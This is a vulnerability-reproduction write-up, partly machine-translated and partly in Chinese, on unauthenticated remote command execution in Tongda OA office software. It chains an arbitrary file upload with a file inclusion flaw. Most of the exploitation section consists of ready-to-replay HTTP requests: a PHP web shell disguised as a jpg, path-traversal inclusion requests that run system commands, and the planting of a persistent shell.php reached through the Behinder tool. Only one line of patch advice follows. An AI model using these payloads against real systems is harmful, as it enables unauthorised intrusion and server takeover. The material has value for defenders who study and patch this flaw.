Example analysis of getshell caused by arbitrary file upload vulnerability and file inclusion vulnerability in Tongda OA front desk

1. Vulnerability introduction

Tongda OA introduction:

Tongda OA (Office Anywhere network intelligent office system) is developed by Beijing Tongda Information Technology Collaborative office automation software independently developed by Technology Co., Ltd. Beijing Tongda Xinke Technology Co., Ltd. is a high-tech team whose main business is the research and development and implementation, service and consulting of collaborative management software. It is the only state-owned enterprise in the domestic collaborative management software industry. unit, China's leading company in collaborative management software.

Tongda OA provides information management capabilities for many users of different sizes in various industries, including process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office, etc., helping users reduce communication and management cost, and improve production and decision-making efficiency. The system adopts the leading B/S (browser/server) operation method, making network office unrestricted by geography. Tongda Office Anywhere uses WEB-based enterprise computing, and the main HTTP server uses the world's most advanced Apache server, with stable and reliable performance. Centralized control of data access avoids the possibility of data leakage. Provide data backup tools to protect system data security. Multi-level permission control, complete password verification and login verification mechanisms further enhance system security.

The versions affected by the vulnerability are:

V11 version, 2017 version, 2016 version, 2015 version, 2013 enhanced version, and 2013 version.

Remarks:

No need to log in, the vulnerability can be exploited at the front desk

2013 version:

File upload vulnerability path: / isspirit/im/upload.php

File contains vulnerability path:/ispirit/interface/gateway.php

2017 version:

File upload vulnerability path:/ispirit/im The /upload.php

file contains the vulnerability path: /mac/gateway.php

Vulnerability environment:

Target machine (Windows server 2008 R2) IP: 172.16.0.45

Tongda OA: V 11.3 version

2. Environment setup

(1) After downloading Tongda OA V11.3 version , click the application running file

to run TDOA11.3 (2) Make sure that port 80 is not occupied, build the application on port 80, and then click Next

(3) Configuration completed

(4) View the built Result

(5) The account is admin, the password is empty, log in to the back-end system

3. Vulnerabilities Recurrence

3.1 Execution of arbitrary commands

(2) There is a front-end vulnerability that allows uploading of arbitrary files without logging in. An attacker can capture the data packet, modify it and repeat it. The way to put data packets is to upload Trojan files with the suffix jpg to attack the system

POST /ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: closeContent-Length: 660------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php $command=$_POST[&#39;cmd&#39;];$wsh = new COM(&#39;WScript.shell&#39;);$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh2YB4pV8McGB--

(2) Check the running results

(3) The front-end file contains a vulnerability: modify the data package to include the jpg Trojan file uploaded earlier, and you can execute any command

Execute the command "net user" here

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user

(4) The front-end file contains a vulnerability: modify the data package to include the jpg Trojan file uploaded earlier, and you can execute arbitrary commands

Execute here Command "ipconfig"

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig

3.2 getshell

(1) Foreground arbitrary file upload vulnerability: capture arbitrary data packets, modify Replay the data packet and upload the Trojan file with the suffix jpg (the Trojan file performs the file writing operation)

POST /ispirit/im/upload.php HTTP/1.1

（2）查看运行结果

（3）查看/webroot/ispirit/interface/目录下的文件信息

（4）前台文件包含漏洞：修改数据包，包含前面上传的jpg木马文件，会在文件包含的根目录下生成一个 shell.php 文件

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig

（5）查看文件包含漏洞的执行结果

（6）使用冰蝎进行连接：http://172.16.0.45/ispirit/interface/shell.php

密码为：pass

PS：此处用蚁剑和菜刀无法进行连接

四、加固建议

我们建议通达OA用户使用受影响版本登录通达OA官网，并获取最新的补丁。请根据当前OA版本选择所对应的程序文件，运行前请先做好备份。

The above is the detailed content of Example analysis of getshell caused by arbitrary file upload vulnerability and file inclusion vulnerability in Tongda OA front desk. For more information, please follow other related articles on the PHP Chinese website!